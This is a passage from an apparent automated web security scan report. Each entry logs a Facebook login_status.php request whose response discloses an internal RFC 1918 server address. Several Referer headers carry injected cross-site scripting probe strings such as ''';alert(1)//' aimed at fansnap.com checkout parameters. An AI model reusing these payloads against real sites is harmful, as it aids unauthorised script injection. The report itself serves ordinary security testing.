Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966945f62%27%3balert(1)//460f48c4516
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.196.51
X-Cnection: close
Date: Tue, 19 Jul 2011 19:37:47 GMT
Content-Length: 262

<script type="text/javascript">
parent.postMessage("cb=f20a730148e3ed8&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff2e913c7b336fc&relation=parent&transport=postmessage&frame=fb38258b47c
...[SNIP]...

24.198. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11485e925850a%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff15fe570c4f19c8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e4c7e6a1f331e%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff15fe570c4f19c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3cc4a3b9d3dc2a%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ca9fc5d7e2dc8%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff15fe570c4f19c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3cc4a3b9d3dc2a&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df373cd6f2fb9756%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff15fe570c4f19c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3cc4a3b9d3dc2a&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36f751e3ef111c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff15fe570c4f19c8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3cc4a3b9d3dc2a&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=44bca%27%3balert(1)//30702b33e3b&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.43
X-Cnection: close
Date: Tue, 19 Jul 2011 19:37:29 GMT
Content-Length: 265

<script type="text/javascript">
parent.postMessage("cb=f373cd6f2fb9756&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff15fe570c4f19c8&relation=parent&transport=postmessage&frame=f3cc4a3b9d
...[SNIP]...

24.199. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3636742f%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff259da1a14%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11c2df44c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff259da1a14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa923967c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb1a0ff0%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff259da1a14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa923967c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33a0a9f18%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff259da1a14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa923967c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b17a373%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff259da1a14%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa923967c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.218.26
X-Cnection: close
Date: Tue, 19 Jul 2011 18:35:29 GMT
Content-Length: 244

<script type="text/javascript">
parent.postMessage("cb=f33a0a9f18&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff259da1a14&relation=parent&transport=postmessage&frame=fa923967c", "http:\/
...[SNIP]...

24.200. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ff5f0e8b134de%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13a4b58fd61a38%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12e0dae317b412%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29f18889d922fc%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12e0dae317b412&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb666067bb7aa2%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12e0dae317b412&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df347958d5b2f7c4%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12e0dae317b412&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.198.46
X-Cnection: close
Date: Tue, 19 Jul 2011 19:34:10 GMT
Content-Length: 262

<script type="text/javascript">
parent.postMessage("cb=fb666067bb7aa2&origin=http\u00253A\u00252F\u00252Fwww.fansnap.com\u00252Ff2c50e859711ee2&relation=parent&transport=postmessage&frame=f12e0dae317b
...[SNIP]...

24.201. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_998904&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_998904&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.108.37
X-Cnection: close
Date: Tue, 19 Jul 2011 23:37:22 GMT
Content-Length: 0


24.202. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df355c92d185f2a%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff12660bcec2dd78%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b559618d0162a%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff12660bcec2dd78%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5793fe4f74f1c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e6015153540ba%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff12660bcec2dd78%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5793fe4f74f1c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c4862873084c8%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff12660bcec2dd78%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5793fe4f74f1c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df231c46154e53%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff12660bcec2dd78%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5793fe4f74f1c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/about
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.237.60
X-Cnection: close
Date: Tue, 19 Jul 2011 18:44:01 GMT
Content-Length: 262

<script type="text/javascript">
parent.postMessage("cb=f3c4862873084c8&origin=http\u00253A\u00252F\u00252Fwww.fansnap.com\u00252Ff12660bcec2dd78&relation=parent&transport=postmessage&frame=f5793fe4f74
...[SNIP]...

24.203. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1686338d38dfbc%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff3e57b37faf9558%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe2236ec097996%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff3e57b37faf9558%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2aeb7d36dc397a%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f2f3167aea19%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff3e57b37faf9558%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2aeb7d36dc397a&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df161fabdc7d8a1e%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff3e57b37faf9558%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2aeb7d36dc397a&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d91c710287fe%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff3e57b37faf9558%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2aeb7d36dc397a&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=44bca%27%3balert(1)//30702b33e3b&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.159.32
X-Cnection: close
Date: Tue, 19 Jul 2011 18:48:42 GMT
Content-Length: 265

<script type="text/javascript">
parent.postMessage("cb=f161fabdc7d8a1e&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff3e57b37faf9558&relation=parent&transport=postmessage&frame=f2aeb7d36d
...[SNIP]...

24.204. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15cdfc84b56a52%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff17ef442c548c7%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df178ab2524b188%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff17ef442c548c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19c94786796c52%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df241be2562ee3a%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff17ef442c548c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19c94786796c52&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d47ae2dd4c5e%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff17ef442c548c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19c94786796c52&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1efcdc5ce35b4c%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff17ef442c548c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19c94786796c52&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/developers
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.222.31
X-Cnection: close
Date: Tue, 19 Jul 2011 18:44:20 GMT
Content-Length: 260

<script type="text/javascript">
parent.postMessage("cb=f1d47ae2dd4c5e&origin=http\u00253A\u00252F\u00252Fwww.fansnap.com\u00252Ff17ef442c548c7&relation=parent&transport=postmessage&frame=f19c94786796c
...[SNIP]...

24.205. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2fef29c8e6a70c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff9ff9c974dd38c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df82f11d2b8d0c6%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff9ff9c974dd38c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1da7e6f03c38%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c3ce23fcbf6aa%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff9ff9c974dd38c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1da7e6f03c38&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e8e6b9e70b968%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff9ff9c974dd38c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1da7e6f03c38&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30797641bff8c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff9ff9c974dd38c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1da7e6f03c38&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=44bca%27%3balert(document.location)//30702b33e3b&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.138.56
X-Cnection: close
Date: Tue, 19 Jul 2011 18:48:21 GMT
Content-Length: 263

<script type="text/javascript">
parent.postMessage("cb=f1e8e6b9e70b968&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff9ff9c974dd38c&relation=parent&transport=postmessage&frame=f2a1da7e6f0
...[SNIP]...

24.206. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_998904&sId=0
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_998904&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.107.65
X-Cnection: close
Date: Tue, 19 Jul 2011 23:01:15 GMT
Content-Length: 0


24.207. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.25
X-Cnection: close
Date: Tue, 19 Jul 2011 15:16:02 GMT
Content-Length: 0


24.208. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
